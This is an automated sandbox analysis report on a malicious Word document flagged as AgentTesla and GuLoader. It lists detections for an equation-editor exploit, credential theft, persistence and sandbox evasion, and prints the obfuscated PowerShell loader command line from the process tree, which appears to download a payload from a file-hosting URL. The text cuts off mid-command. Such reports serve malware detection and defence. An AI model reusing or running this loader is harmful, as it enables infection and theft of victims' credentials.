Edit tour
Windows
Analysis Report
COACH APRIL ORDER.doc
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 3172 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - EQNEDT32.EXE (PID: 3252 cmdline:
"C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) - wscript.exe (PID: 3420 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\magic remoihohj7 5.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) - WmiPrvSE.exe (PID: 3504 cmdline:
C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 54B7C43C2E89F5CE71B2C255C1CF35E2) - powershell.exe (PID: 3548 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Langshan s225 = 1;$ Forandring ssaetninge r='Substri n';$Forand ringssaetn inger+='g' ;Function Thysanoura ($Agentens ){$Oncogra phy=$Agent ens.Length -$Langshan s225;For($ Preindispo sing=5; $P reindispos ing -lt $O ncography; $Preindis posing+=(6 )){$Bugtni ngernes+=$ Agentens.$ Forandring ssaetninge r.Invoke($ Preindispo sing, $Lan gshans225) ;}$Bugtnin gernes;}fu nction Dry ptrrendes( $Eksportpr iserne){& ($Per idot) ($Ek sportprise rne);}$Hjl pevariabel s=Thysanou ra 'tilbuM Indseo aut ozDiscoi t enolAnskul Fo.tjaSolc e/Nere 5 P ie.. Comp0 Dana St m m(PaafyW P leniNonden ehngdOmby to NebewHi ndespost, .ooscNIsom eT,akul Fi n h1Uriel0 .uzzl.Tang s0Squal;Ap art OmgreW PiratiBou, inShape6Up rid4Inspe; Un.il A,el pxBana,6Fo ,ur4Promi; Pro s Gemm r U snvOut s :Sikri1E u,as2Polac 1reill.ard or0 Mett)U ltra MichG Pra ie Sal ac HuddkLi turoTaxon/ Demor2 Hu t0Caeom1 H e r0 Wri 0 .nsum1Form a0vattp1Ho riz .etjeF .gedaiAs u erProgreOb ersfObteco KarikxDe,a t/Pull,1Pw cat2.besk1 Am.rb..nwi d0 Fond '; $Epiphyll= Thysanoura ' triuULi mmasEnefoe F,rklrShac k-Tr,nsA S ithgTi.sre LgstrnMenn et Unbe '; $Jellab=Th ysanoura ' Ma.ehPlus gtTilskt H ekspSports P.ed: Mer i/Propo/ra bardSarodr DithiBrys tv,fikke R ele..vrfag CaukfoCo u moMiljvgF, glelB,rgae Vacuu.Smid icBetleoPo lyamTessa/ EntrauCons tcDamef?Af tjee ynebx Lnkamp,ine ro OpvarIn tegtVaria= SampldPilo boAnnitwPo .denforbrl MegacoTrvl earo kedFo r i&Ho.sei GjortdPrin t= Ener1Do mi,H,nter8 EnnovAccr u0 Tan.ZSp r t9,rsteq S.mle8Inte Bun,reOSp .tt4UnfavU KnapTSpin dEMete NDo rnukAtavib F,rsiTMeta laSl ngiNy cteWHei.sp SpinocSupe riKroke8Op enhYUndiv0 KongsjCe e aY isjRThe isnGu df3 Schl ';$Af prvendes=T hysanoura ' .ima>Ank ny ';$Peri dot=Thysan oura 'Un,i likropeeFl etnxPa.ah ';$Dysmorf ismen = Th ysanoura ' Amene Zim bcBesl.hGo ddaoDrake Riba%Offer aSylt,pRdn bspAnlagdC rookaRenas t EmbeaHoe jr%,ones\U ningddisin iChefkaLsd pelSagsko EluvgKonfi iHensys De lpt Be ui uffc Ram.. Du,oH.ons ce H ndd A ppa d,ivi& Caus&Grew s DkseeHem atc forsh ndeno Dans Couac$ Ur et ';Drypt rrendes (T hysanoura ',eori$Omg rug arnel .ubloH.gle b rana Fin llOppus:Ri ,etIMindrn TiaartAfmr .ePsykorBl egsmUdfrso Alumid ,mi siPrivilpa perlTrykki SineoDoce nSlyng=Li ,en( Sangc TidsbmUndu ld Tet C. nc/ Ha.dcv edre Sp y$ PolypDOver vy SkumsKy urimTilbuo Premur Ant ifExperi d elesExan m Jernbe Ove rnJounc)op els ');Dry ptrrendes (Thysanour a 'Pe.se$H exylgSpan, l Fusio .r aubBejlea Udd.l .mer :Topo.OTu ehmWithhs ,plakFlank rn nehi.yb frvPublie Crimnenzym dCheckeFor ,ts Ove.=D ogmi$Bebud JTotale S, belComprlG i.peaInput bTog,t.Ma